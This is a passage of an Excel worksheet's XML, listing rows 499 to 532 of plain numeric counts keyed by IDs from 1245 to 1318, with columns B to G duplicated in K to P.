      <c r="A499" s="7">
        <v>1245</v>
      </c>
      <c r="B499" s="8">
        <v>25</v>
      </c>
      <c r="C499" s="8">
        <v>1</v>
      </c>
      <c r="D499" s="8">
        <v>140</v>
      </c>
      <c r="E499" s="8">
        <v>269</v>
      </c>
      <c r="F499" s="8">
        <v>38</v>
      </c>
      <c r="G499" s="8">
        <v>21</v>
      </c>
      <c r="H499" s="8">
        <v>494</v>
      </c>
      <c r="K499" s="7">
        <v>1245</v>
      </c>
      <c r="L499" s="8">
        <v>25</v>
      </c>
      <c r="M499" s="8">
        <v>1</v>
      </c>
      <c r="N499" s="8">
        <v>140</v>
      </c>
      <c r="O499" s="8">
        <v>269</v>
      </c>
      <c r="P499" s="8">
        <v>38</v>
      </c>
      <c r="Q499" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="500" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A500" s="7">
        <v>1246</v>
      </c>
      <c r="B500" s="8">
        <v>30</v>
      </c>
      <c r="C500" s="8">
        <v>0</v>
      </c>
      <c r="D500" s="8">
        <v>44</v>
      </c>
      <c r="E500" s="8">
        <v>43</v>
      </c>
      <c r="F500" s="8">
        <v>5</v>
      </c>
      <c r="G500" s="8">
        <v>6</v>
      </c>
      <c r="H500" s="8">
        <v>128</v>
      </c>
      <c r="K500" s="7">
        <v>1246</v>
      </c>
      <c r="L500" s="8">
        <v>30</v>
      </c>
      <c r="M500" s="8">
        <v>0</v>
      </c>
      <c r="N500" s="8">
        <v>44</v>
      </c>
      <c r="O500" s="8">
        <v>43</v>
      </c>
      <c r="P500" s="8">
        <v>5</v>
      </c>
      <c r="Q500" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="501" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A501" s="7">
        <v>1248</v>
      </c>
      <c r="B501" s="8">
        <v>0</v>
      </c>
      <c r="C501" s="8">
        <v>0</v>
      </c>
      <c r="D501" s="8">
        <v>0</v>
      </c>
      <c r="E501" s="8">
        <v>0</v>
      </c>
      <c r="F501" s="8">
        <v>18</v>
      </c>
      <c r="G501" s="8">
        <v>2</v>
      </c>
      <c r="H501" s="8">
        <v>20</v>
      </c>
      <c r="K501" s="7">
        <v>1248</v>
      </c>
      <c r="L501" s="8">
        <v>0</v>
      </c>
      <c r="M501" s="8">
        <v>0</v>
      </c>
      <c r="N501" s="8">
        <v>0</v>
      </c>
      <c r="O501" s="8">
        <v>0</v>
      </c>
      <c r="P501" s="8">
        <v>18</v>
      </c>
      <c r="Q501" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="502" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A502" s="7">
        <v>1249</v>
      </c>
      <c r="B502" s="8">
        <v>26</v>
      </c>
      <c r="C502" s="8">
        <v>2</v>
      </c>
      <c r="D502" s="8">
        <v>0</v>
      </c>
      <c r="E502" s="8">
        <v>0</v>
      </c>
      <c r="F502" s="8">
        <v>11</v>
      </c>
      <c r="G502" s="8">
        <v>1</v>
      </c>
      <c r="H502" s="8">
        <v>40</v>
      </c>
      <c r="K502" s="7">
        <v>1249</v>
      </c>
      <c r="L502" s="8">
        <v>26</v>
      </c>
      <c r="M502" s="8">
        <v>2</v>
      </c>
      <c r="N502" s="8">
        <v>0</v>
      </c>
      <c r="O502" s="8">
        <v>0</v>
      </c>
      <c r="P502" s="8">
        <v>11</v>
      </c>
      <c r="Q502" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="503" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A503" s="7">
        <v>1256</v>
      </c>
      <c r="B503" s="8">
        <v>0</v>
      </c>
      <c r="C503" s="8">
        <v>0</v>
      </c>
      <c r="D503" s="8">
        <v>0</v>
      </c>
      <c r="E503" s="8">
        <v>0</v>
      </c>
      <c r="F503" s="8">
        <v>18</v>
      </c>
      <c r="G503" s="8">
        <v>9</v>
      </c>
      <c r="H503" s="8">
        <v>27</v>
      </c>
      <c r="K503" s="7">
        <v>1256</v>
      </c>
      <c r="L503" s="8">
        <v>0</v>
      </c>
      <c r="M503" s="8">
        <v>0</v>
      </c>
      <c r="N503" s="8">
        <v>0</v>
      </c>
      <c r="O503" s="8">
        <v>0</v>
      </c>
      <c r="P503" s="8">
        <v>18</v>
      </c>
      <c r="Q503" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="504" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A504" s="7">
        <v>1257</v>
      </c>
      <c r="B504" s="8">
        <v>22</v>
      </c>
      <c r="C504" s="8">
        <v>1</v>
      </c>
      <c r="D504" s="8">
        <v>5</v>
      </c>
      <c r="E504" s="8">
        <v>33</v>
      </c>
      <c r="F504" s="8">
        <v>11</v>
      </c>
      <c r="G504" s="8">
        <v>6</v>
      </c>
      <c r="H504" s="8">
        <v>78</v>
      </c>
      <c r="K504" s="7">
        <v>1257</v>
      </c>
      <c r="L504" s="8">
        <v>22</v>
      </c>
      <c r="M504" s="8">
        <v>1</v>
      </c>
      <c r="N504" s="8">
        <v>5</v>
      </c>
      <c r="O504" s="8">
        <v>33</v>
      </c>
      <c r="P504" s="8">
        <v>11</v>
      </c>
      <c r="Q504" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="505" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A505" s="7">
        <v>1259</v>
      </c>
      <c r="B505" s="8">
        <v>25</v>
      </c>
      <c r="C505" s="8">
        <v>1</v>
      </c>
      <c r="D505" s="8">
        <v>5</v>
      </c>
      <c r="E505" s="8">
        <v>1</v>
      </c>
      <c r="F505" s="8">
        <v>24</v>
      </c>
      <c r="G505" s="8">
        <v>0</v>
      </c>
      <c r="H505" s="8">
        <v>56</v>
      </c>
      <c r="K505" s="7">
        <v>1259</v>
      </c>
      <c r="L505" s="8">
        <v>25</v>
      </c>
      <c r="M505" s="8">
        <v>1</v>
      </c>
      <c r="N505" s="8">
        <v>5</v>
      </c>
      <c r="O505" s="8">
        <v>1</v>
      </c>
      <c r="P505" s="8">
        <v>24</v>
      </c>
      <c r="Q505" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="506" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A506" s="7">
        <v>1262</v>
      </c>
      <c r="B506" s="8">
        <v>6</v>
      </c>
      <c r="C506" s="8">
        <v>0</v>
      </c>
      <c r="D506" s="8">
        <v>0</v>
      </c>
      <c r="E506" s="8">
        <v>0</v>
      </c>
      <c r="F506" s="8">
        <v>3</v>
      </c>
      <c r="G506" s="8">
        <v>3</v>
      </c>
      <c r="H506" s="8">
        <v>12</v>
      </c>
      <c r="K506" s="7">
        <v>1262</v>
      </c>
      <c r="L506" s="8">
        <v>6</v>
      </c>
      <c r="M506" s="8">
        <v>0</v>
      </c>
      <c r="N506" s="8">
        <v>0</v>
      </c>
      <c r="O506" s="8">
        <v>0</v>
      </c>
      <c r="P506" s="8">
        <v>3</v>
      </c>
      <c r="Q506" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="507" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A507" s="7">
        <v>1265</v>
      </c>
      <c r="B507" s="8">
        <v>24</v>
      </c>
      <c r="C507" s="8">
        <v>1</v>
      </c>
      <c r="D507" s="8">
        <v>245</v>
      </c>
      <c r="E507" s="8">
        <v>875</v>
      </c>
      <c r="F507" s="8">
        <v>29</v>
      </c>
      <c r="G507" s="8">
        <v>22</v>
      </c>
      <c r="H507" s="8">
        <v>1196</v>
      </c>
      <c r="K507" s="7">
        <v>1265</v>
      </c>
      <c r="L507" s="8">
        <v>24</v>
      </c>
      <c r="M507" s="8">
        <v>1</v>
      </c>
      <c r="N507" s="8">
        <v>245</v>
      </c>
      <c r="O507" s="8">
        <v>875</v>
      </c>
      <c r="P507" s="8">
        <v>29</v>
      </c>
      <c r="Q507" s="8">
        <v>22</v>
      </c>
    </row>
    <row r="508" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A508" s="7">
        <v>1266</v>
      </c>
      <c r="B508" s="8">
        <v>25</v>
      </c>
      <c r="C508" s="8">
        <v>0</v>
      </c>
      <c r="D508" s="8">
        <v>10</v>
      </c>
      <c r="E508" s="8">
        <v>32</v>
      </c>
      <c r="F508" s="8">
        <v>26</v>
      </c>
      <c r="G508" s="8">
        <v>23</v>
      </c>
      <c r="H508" s="8">
        <v>116</v>
      </c>
      <c r="K508" s="7">
        <v>1266</v>
      </c>
      <c r="L508" s="8">
        <v>25</v>
      </c>
      <c r="M508" s="8">
        <v>0</v>
      </c>
      <c r="N508" s="8">
        <v>10</v>
      </c>
      <c r="O508" s="8">
        <v>32</v>
      </c>
      <c r="P508" s="8">
        <v>26</v>
      </c>
      <c r="Q508" s="8">
        <v>23</v>
      </c>
    </row>
    <row r="509" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A509" s="7">
        <v>1267</v>
      </c>
      <c r="B509" s="8">
        <v>20</v>
      </c>
      <c r="C509" s="8">
        <v>1</v>
      </c>
      <c r="D509" s="8">
        <v>6</v>
      </c>
      <c r="E509" s="8">
        <v>34</v>
      </c>
      <c r="F509" s="8">
        <v>18</v>
      </c>
      <c r="G509" s="8">
        <v>10</v>
      </c>
      <c r="H509" s="8">
        <v>89</v>
      </c>
      <c r="K509" s="7">
        <v>1267</v>
      </c>
      <c r="L509" s="8">
        <v>20</v>
      </c>
      <c r="M509" s="8">
        <v>1</v>
      </c>
      <c r="N509" s="8">
        <v>6</v>
      </c>
      <c r="O509" s="8">
        <v>34</v>
      </c>
      <c r="P509" s="8">
        <v>18</v>
      </c>
      <c r="Q509" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="510" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A510" s="7">
        <v>1270</v>
      </c>
      <c r="B510" s="8">
        <v>31</v>
      </c>
      <c r="C510" s="8">
        <v>1</v>
      </c>
      <c r="D510" s="8">
        <v>0</v>
      </c>
      <c r="E510" s="8">
        <v>0</v>
      </c>
      <c r="F510" s="8">
        <v>10</v>
      </c>
      <c r="G510" s="8">
        <v>10</v>
      </c>
      <c r="H510" s="8">
        <v>52</v>
      </c>
      <c r="K510" s="7">
        <v>1270</v>
      </c>
      <c r="L510" s="8">
        <v>31</v>
      </c>
      <c r="M510" s="8">
        <v>1</v>
      </c>
      <c r="N510" s="8">
        <v>0</v>
      </c>
      <c r="O510" s="8">
        <v>0</v>
      </c>
      <c r="P510" s="8">
        <v>10</v>
      </c>
      <c r="Q510" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="511" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A511" s="7">
        <v>1272</v>
      </c>
      <c r="B511" s="8">
        <v>26</v>
      </c>
      <c r="C511" s="8">
        <v>1</v>
      </c>
      <c r="D511" s="8">
        <v>9</v>
      </c>
      <c r="E511" s="8">
        <v>5</v>
      </c>
      <c r="F511" s="8">
        <v>6</v>
      </c>
      <c r="G511" s="8">
        <v>2</v>
      </c>
      <c r="H511" s="8">
        <v>49</v>
      </c>
      <c r="K511" s="7">
        <v>1272</v>
      </c>
      <c r="L511" s="8">
        <v>26</v>
      </c>
      <c r="M511" s="8">
        <v>1</v>
      </c>
      <c r="N511" s="8">
        <v>9</v>
      </c>
      <c r="O511" s="8">
        <v>5</v>
      </c>
      <c r="P511" s="8">
        <v>6</v>
      </c>
      <c r="Q511" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="512" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A512" s="7">
        <v>1274</v>
      </c>
      <c r="B512" s="8">
        <v>6</v>
      </c>
      <c r="C512" s="8">
        <v>2</v>
      </c>
      <c r="D512" s="8">
        <v>0</v>
      </c>
      <c r="E512" s="8">
        <v>0</v>
      </c>
      <c r="F512" s="8">
        <v>7</v>
      </c>
      <c r="G512" s="8">
        <v>5</v>
      </c>
      <c r="H512" s="8">
        <v>20</v>
      </c>
      <c r="K512" s="7">
        <v>1274</v>
      </c>
      <c r="L512" s="8">
        <v>6</v>
      </c>
      <c r="M512" s="8">
        <v>2</v>
      </c>
      <c r="N512" s="8">
        <v>0</v>
      </c>
      <c r="O512" s="8">
        <v>0</v>
      </c>
      <c r="P512" s="8">
        <v>7</v>
      </c>
      <c r="Q512" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="513" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A513" s="7">
        <v>1275</v>
      </c>
      <c r="B513" s="8">
        <v>6</v>
      </c>
      <c r="C513" s="8">
        <v>0</v>
      </c>
      <c r="D513" s="8">
        <v>28</v>
      </c>
      <c r="E513" s="8">
        <v>42</v>
      </c>
      <c r="F513" s="8">
        <v>10</v>
      </c>
      <c r="G513" s="8">
        <v>6</v>
      </c>
      <c r="H513" s="8">
        <v>92</v>
      </c>
      <c r="K513" s="7">
        <v>1275</v>
      </c>
      <c r="L513" s="8">
        <v>6</v>
      </c>
      <c r="M513" s="8">
        <v>0</v>
      </c>
      <c r="N513" s="8">
        <v>28</v>
      </c>
      <c r="O513" s="8">
        <v>42</v>
      </c>
      <c r="P513" s="8">
        <v>10</v>
      </c>
      <c r="Q513" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="514" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A514" s="7">
        <v>1277</v>
      </c>
      <c r="B514" s="8">
        <v>26</v>
      </c>
      <c r="C514" s="8">
        <v>0</v>
      </c>
      <c r="D514" s="8">
        <v>0</v>
      </c>
      <c r="E514" s="8">
        <v>0</v>
      </c>
      <c r="F514" s="8">
        <v>7</v>
      </c>
      <c r="G514" s="8">
        <v>0</v>
      </c>
      <c r="H514" s="8">
        <v>33</v>
      </c>
      <c r="K514" s="7">
        <v>1277</v>
      </c>
      <c r="L514" s="8">
        <v>26</v>
      </c>
      <c r="M514" s="8">
        <v>0</v>
      </c>
      <c r="N514" s="8">
        <v>0</v>
      </c>
      <c r="O514" s="8">
        <v>0</v>
      </c>
      <c r="P514" s="8">
        <v>7</v>
      </c>
      <c r="Q514" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="515" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A515" s="7">
        <v>1278</v>
      </c>
      <c r="B515" s="8">
        <v>20</v>
      </c>
      <c r="C515" s="8">
        <v>2</v>
      </c>
      <c r="D515" s="8">
        <v>0</v>
      </c>
      <c r="E515" s="8">
        <v>0</v>
      </c>
      <c r="F515" s="8">
        <v>1002</v>
      </c>
      <c r="G515" s="8">
        <v>491</v>
      </c>
      <c r="H515" s="8">
        <v>1515</v>
      </c>
      <c r="K515" s="7">
        <v>1278</v>
      </c>
      <c r="L515" s="8">
        <v>20</v>
      </c>
      <c r="M515" s="8">
        <v>2</v>
      </c>
      <c r="N515" s="8">
        <v>0</v>
      </c>
      <c r="O515" s="8">
        <v>0</v>
      </c>
      <c r="P515" s="8">
        <v>1002</v>
      </c>
      <c r="Q515" s="8">
        <v>491</v>
      </c>
    </row>
    <row r="516" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A516" s="7">
        <v>1285</v>
      </c>
      <c r="B516" s="8">
        <v>28</v>
      </c>
      <c r="C516" s="8">
        <v>1</v>
      </c>
      <c r="D516" s="8">
        <v>5</v>
      </c>
      <c r="E516" s="8">
        <v>0</v>
      </c>
      <c r="F516" s="8">
        <v>4</v>
      </c>
      <c r="G516" s="8">
        <v>1</v>
      </c>
      <c r="H516" s="8">
        <v>39</v>
      </c>
      <c r="K516" s="7">
        <v>1285</v>
      </c>
      <c r="L516" s="8">
        <v>28</v>
      </c>
      <c r="M516" s="8">
        <v>1</v>
      </c>
      <c r="N516" s="8">
        <v>5</v>
      </c>
      <c r="O516" s="8">
        <v>0</v>
      </c>
      <c r="P516" s="8">
        <v>4</v>
      </c>
      <c r="Q516" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="517" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A517" s="7">
        <v>1287</v>
      </c>
      <c r="B517" s="8">
        <v>26</v>
      </c>
      <c r="C517" s="8">
        <v>1</v>
      </c>
      <c r="D517" s="8">
        <v>4</v>
      </c>
      <c r="E517" s="8">
        <v>36</v>
      </c>
      <c r="F517" s="8">
        <v>0</v>
      </c>
      <c r="G517" s="8">
        <v>2</v>
      </c>
      <c r="H517" s="8">
        <v>69</v>
      </c>
      <c r="K517" s="7">
        <v>1287</v>
      </c>
      <c r="L517" s="8">
        <v>26</v>
      </c>
      <c r="M517" s="8">
        <v>1</v>
      </c>
      <c r="N517" s="8">
        <v>4</v>
      </c>
      <c r="O517" s="8">
        <v>36</v>
      </c>
      <c r="P517" s="8">
        <v>0</v>
      </c>
      <c r="Q517" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="518" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A518" s="7">
        <v>1290</v>
      </c>
      <c r="B518" s="8">
        <v>26</v>
      </c>
      <c r="C518" s="8">
        <v>1</v>
      </c>
      <c r="D518" s="8">
        <v>0</v>
      </c>
      <c r="E518" s="8">
        <v>0</v>
      </c>
      <c r="F518" s="8">
        <v>62</v>
      </c>
      <c r="G518" s="8">
        <v>7</v>
      </c>
      <c r="H518" s="8">
        <v>96</v>
      </c>
      <c r="K518" s="7">
        <v>1290</v>
      </c>
      <c r="L518" s="8">
        <v>26</v>
      </c>
      <c r="M518" s="8">
        <v>1</v>
      </c>
      <c r="N518" s="8">
        <v>0</v>
      </c>
      <c r="O518" s="8">
        <v>0</v>
      </c>
      <c r="P518" s="8">
        <v>62</v>
      </c>
      <c r="Q518" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="519" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A519" s="7">
        <v>1291</v>
      </c>
      <c r="B519" s="8">
        <v>24</v>
      </c>
      <c r="C519" s="8">
        <v>0</v>
      </c>
      <c r="D519" s="8">
        <v>12</v>
      </c>
      <c r="E519" s="8">
        <v>6</v>
      </c>
      <c r="F519" s="8">
        <v>13</v>
      </c>
      <c r="G519" s="8">
        <v>4</v>
      </c>
      <c r="H519" s="8">
        <v>59</v>
      </c>
      <c r="K519" s="7">
        <v>1291</v>
      </c>
      <c r="L519" s="8">
        <v>24</v>
      </c>
      <c r="M519" s="8">
        <v>0</v>
      </c>
      <c r="N519" s="8">
        <v>12</v>
      </c>
      <c r="O519" s="8">
        <v>6</v>
      </c>
      <c r="P519" s="8">
        <v>13</v>
      </c>
      <c r="Q519" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="520" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A520" s="7">
        <v>1292</v>
      </c>
      <c r="B520" s="8">
        <v>26</v>
      </c>
      <c r="C520" s="8">
        <v>0</v>
      </c>
      <c r="D520" s="8">
        <v>10</v>
      </c>
      <c r="E520" s="8">
        <v>4</v>
      </c>
      <c r="F520" s="8">
        <v>9</v>
      </c>
      <c r="G520" s="8">
        <v>4</v>
      </c>
      <c r="H520" s="8">
        <v>53</v>
      </c>
      <c r="K520" s="7">
        <v>1292</v>
      </c>
      <c r="L520" s="8">
        <v>26</v>
      </c>
      <c r="M520" s="8">
        <v>0</v>
      </c>
      <c r="N520" s="8">
        <v>10</v>
      </c>
      <c r="O520" s="8">
        <v>4</v>
      </c>
      <c r="P520" s="8">
        <v>9</v>
      </c>
      <c r="Q520" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="521" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A521" s="7">
        <v>1295</v>
      </c>
      <c r="B521" s="8">
        <v>0</v>
      </c>
      <c r="C521" s="8">
        <v>0</v>
      </c>
      <c r="D521" s="8">
        <v>0</v>
      </c>
      <c r="E521" s="8">
        <v>0</v>
      </c>
      <c r="F521" s="8">
        <v>14</v>
      </c>
      <c r="G521" s="8">
        <v>4</v>
      </c>
      <c r="H521" s="8">
        <v>18</v>
      </c>
      <c r="K521" s="7">
        <v>1295</v>
      </c>
      <c r="L521" s="8">
        <v>0</v>
      </c>
      <c r="M521" s="8">
        <v>0</v>
      </c>
      <c r="N521" s="8">
        <v>0</v>
      </c>
      <c r="O521" s="8">
        <v>0</v>
      </c>
      <c r="P521" s="8">
        <v>14</v>
      </c>
      <c r="Q521" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="522" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A522" s="7">
        <v>1296</v>
      </c>
      <c r="B522" s="8">
        <v>25</v>
      </c>
      <c r="C522" s="8">
        <v>1</v>
      </c>
      <c r="D522" s="8">
        <v>7</v>
      </c>
      <c r="E522" s="8">
        <v>0</v>
      </c>
      <c r="F522" s="8">
        <v>11</v>
      </c>
      <c r="G522" s="8">
        <v>4</v>
      </c>
      <c r="H522" s="8">
        <v>48</v>
      </c>
      <c r="K522" s="7">
        <v>1296</v>
      </c>
      <c r="L522" s="8">
        <v>25</v>
      </c>
      <c r="M522" s="8">
        <v>1</v>
      </c>
      <c r="N522" s="8">
        <v>7</v>
      </c>
      <c r="O522" s="8">
        <v>0</v>
      </c>
      <c r="P522" s="8">
        <v>11</v>
      </c>
      <c r="Q522" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="523" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A523" s="7">
        <v>1299</v>
      </c>
      <c r="B523" s="8">
        <v>26</v>
      </c>
      <c r="C523" s="8">
        <v>1</v>
      </c>
      <c r="D523" s="8">
        <v>2</v>
      </c>
      <c r="E523" s="8">
        <v>0</v>
      </c>
      <c r="F523" s="8">
        <v>9</v>
      </c>
      <c r="G523" s="8">
        <v>3</v>
      </c>
      <c r="H523" s="8">
        <v>41</v>
      </c>
      <c r="K523" s="7">
        <v>1299</v>
      </c>
      <c r="L523" s="8">
        <v>26</v>
      </c>
      <c r="M523" s="8">
        <v>1</v>
      </c>
      <c r="N523" s="8">
        <v>2</v>
      </c>
      <c r="O523" s="8">
        <v>0</v>
      </c>
      <c r="P523" s="8">
        <v>9</v>
      </c>
      <c r="Q523" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="524" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A524" s="7">
        <v>1300</v>
      </c>
      <c r="B524" s="8">
        <v>20</v>
      </c>
      <c r="C524" s="8">
        <v>1</v>
      </c>
      <c r="D524" s="8">
        <v>4</v>
      </c>
      <c r="E524" s="8">
        <v>0</v>
      </c>
      <c r="F524" s="8">
        <v>3</v>
      </c>
      <c r="G524" s="8">
        <v>2</v>
      </c>
      <c r="H524" s="8">
        <v>30</v>
      </c>
      <c r="K524" s="7">
        <v>1300</v>
      </c>
      <c r="L524" s="8">
        <v>20</v>
      </c>
      <c r="M524" s="8">
        <v>1</v>
      </c>
      <c r="N524" s="8">
        <v>4</v>
      </c>
      <c r="O524" s="8">
        <v>0</v>
      </c>
      <c r="P524" s="8">
        <v>3</v>
      </c>
      <c r="Q524" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="525" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A525" s="7">
        <v>1302</v>
      </c>
      <c r="B525" s="8">
        <v>20</v>
      </c>
      <c r="C525" s="8">
        <v>0</v>
      </c>
      <c r="D525" s="8">
        <v>0</v>
      </c>
      <c r="E525" s="8">
        <v>0</v>
      </c>
      <c r="F525" s="8">
        <v>0</v>
      </c>
      <c r="G525" s="8">
        <v>5</v>
      </c>
      <c r="H525" s="8">
        <v>25</v>
      </c>
      <c r="K525" s="7">
        <v>1302</v>
      </c>
      <c r="L525" s="8">
        <v>20</v>
      </c>
      <c r="M525" s="8">
        <v>0</v>
      </c>
      <c r="N525" s="8">
        <v>0</v>
      </c>
      <c r="O525" s="8">
        <v>0</v>
      </c>
      <c r="P525" s="8">
        <v>0</v>
      </c>
      <c r="Q525" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="526" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A526" s="7">
        <v>1304</v>
      </c>
      <c r="B526" s="8">
        <v>25</v>
      </c>
      <c r="C526" s="8">
        <v>0</v>
      </c>
      <c r="D526" s="8">
        <v>0</v>
      </c>
      <c r="E526" s="8">
        <v>0</v>
      </c>
      <c r="F526" s="8">
        <v>210</v>
      </c>
      <c r="G526" s="8">
        <v>44</v>
      </c>
      <c r="H526" s="8">
        <v>279</v>
      </c>
      <c r="K526" s="7">
        <v>1304</v>
      </c>
      <c r="L526" s="8">
        <v>25</v>
      </c>
      <c r="M526" s="8">
        <v>0</v>
      </c>
      <c r="N526" s="8">
        <v>0</v>
      </c>
      <c r="O526" s="8">
        <v>0</v>
      </c>
      <c r="P526" s="8">
        <v>210</v>
      </c>
      <c r="Q526" s="8">
        <v>44</v>
      </c>
    </row>
    <row r="527" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A527" s="7">
        <v>1307</v>
      </c>
      <c r="B527" s="8">
        <v>25</v>
      </c>
      <c r="C527" s="8">
        <v>2</v>
      </c>
      <c r="D527" s="8">
        <v>10</v>
      </c>
      <c r="E527" s="8">
        <v>0</v>
      </c>
      <c r="F527" s="8">
        <v>2</v>
      </c>
      <c r="G527" s="8">
        <v>2</v>
      </c>
      <c r="H527" s="8">
        <v>41</v>
      </c>
      <c r="K527" s="7">
        <v>1307</v>
      </c>
      <c r="L527" s="8">
        <v>25</v>
      </c>
      <c r="M527" s="8">
        <v>2</v>
      </c>
      <c r="N527" s="8">
        <v>10</v>
      </c>
      <c r="O527" s="8">
        <v>0</v>
      </c>
      <c r="P527" s="8">
        <v>2</v>
      </c>
      <c r="Q527" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="528" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A528" s="7">
        <v>1308</v>
      </c>
      <c r="B528" s="8">
        <v>26</v>
      </c>
      <c r="C528" s="8">
        <v>0</v>
      </c>
      <c r="D528" s="8">
        <v>0</v>
      </c>
      <c r="E528" s="8">
        <v>0</v>
      </c>
      <c r="F528" s="8">
        <v>13</v>
      </c>
      <c r="G528" s="8">
        <v>0</v>
      </c>
      <c r="H528" s="8">
        <v>39</v>
      </c>
      <c r="K528" s="7">
        <v>1308</v>
      </c>
      <c r="L528" s="8">
        <v>26</v>
      </c>
      <c r="M528" s="8">
        <v>0</v>
      </c>
      <c r="N528" s="8">
        <v>0</v>
      </c>
      <c r="O528" s="8">
        <v>0</v>
      </c>
      <c r="P528" s="8">
        <v>13</v>
      </c>
      <c r="Q528" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="529" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A529" s="7">
        <v>1310</v>
      </c>
      <c r="B529" s="8">
        <v>25</v>
      </c>
      <c r="C529" s="8">
        <v>0</v>
      </c>
      <c r="D529" s="8">
        <v>55</v>
      </c>
      <c r="E529" s="8">
        <v>5</v>
      </c>
      <c r="F529" s="8">
        <v>12</v>
      </c>
      <c r="G529" s="8">
        <v>7</v>
      </c>
      <c r="H529" s="8">
        <v>104</v>
      </c>
      <c r="K529" s="7">
        <v>1310</v>
      </c>
      <c r="L529" s="8">
        <v>25</v>
      </c>
      <c r="M529" s="8">
        <v>0</v>
      </c>
      <c r="N529" s="8">
        <v>55</v>
      </c>
      <c r="O529" s="8">
        <v>5</v>
      </c>
      <c r="P529" s="8">
        <v>12</v>
      </c>
      <c r="Q529" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="530" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A530" s="7">
        <v>1311</v>
      </c>
      <c r="B530" s="8">
        <v>6</v>
      </c>
      <c r="C530" s="8">
        <v>0</v>
      </c>
      <c r="D530" s="8">
        <v>7</v>
      </c>
      <c r="E530" s="8">
        <v>3</v>
      </c>
      <c r="F530" s="8">
        <v>6</v>
      </c>
      <c r="G530" s="8">
        <v>4</v>
      </c>
      <c r="H530" s="8">
        <v>26</v>
      </c>
      <c r="K530" s="7">
        <v>1311</v>
      </c>
      <c r="L530" s="8">
        <v>6</v>
      </c>
      <c r="M530" s="8">
        <v>0</v>
      </c>
      <c r="N530" s="8">
        <v>7</v>
      </c>
      <c r="O530" s="8">
        <v>3</v>
      </c>
      <c r="P530" s="8">
        <v>6</v>
      </c>
      <c r="Q530" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="531" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A531" s="7">
        <v>1312</v>
      </c>
      <c r="B531" s="8">
        <v>25</v>
      </c>
      <c r="C531" s="8">
        <v>1</v>
      </c>
      <c r="D531" s="8">
        <v>0</v>
      </c>
      <c r="E531" s="8">
        <v>0</v>
      </c>
      <c r="F531" s="8">
        <v>14</v>
      </c>
      <c r="G531" s="8">
        <v>2</v>
      </c>
      <c r="H531" s="8">
        <v>42</v>
      </c>
      <c r="K531" s="7">
        <v>1312</v>
      </c>
      <c r="L531" s="8">
        <v>25</v>
      </c>
      <c r="M531" s="8">
        <v>1</v>
      </c>
      <c r="N531" s="8">
        <v>0</v>
      </c>
      <c r="O531" s="8">
        <v>0</v>
      </c>
      <c r="P531" s="8">
        <v>14</v>
      </c>
      <c r="Q531" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="532" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A532" s="7">
        <v>1318</v>
      </c>
      <c r="B532" s="8">
        <v>26</v>
      </c>
      <c r="C532" s="8">
        <v>0</v>
      </c>
      <c r="D532" s="8">
        <v>10</v>
      </c>
      <c r="E532" s="8">
        <v>2</v>
      </c>
      <c r="F532" s="8">
        <v>7</v>
      </c>
      <c r="G532" s="8">
        <v>5</v>
      </c>
      <c r="H532" s="8">
        <v>50</v>
      </c>
      <c r="K532" s="7">
        <v>1318</v>
      </c>
      <c r="L532" s="8">
        <v>26</v>
      </c>
      <c r="M532" s="8">
        <v>0</v>
      </c>
      <c r="N532" s="8">
        <v>10</v>
      </c>
      <c r="O532" s="8">
        <v>2</v>
      </c>
      <c r="P532" s="8">
        <v>7</v>
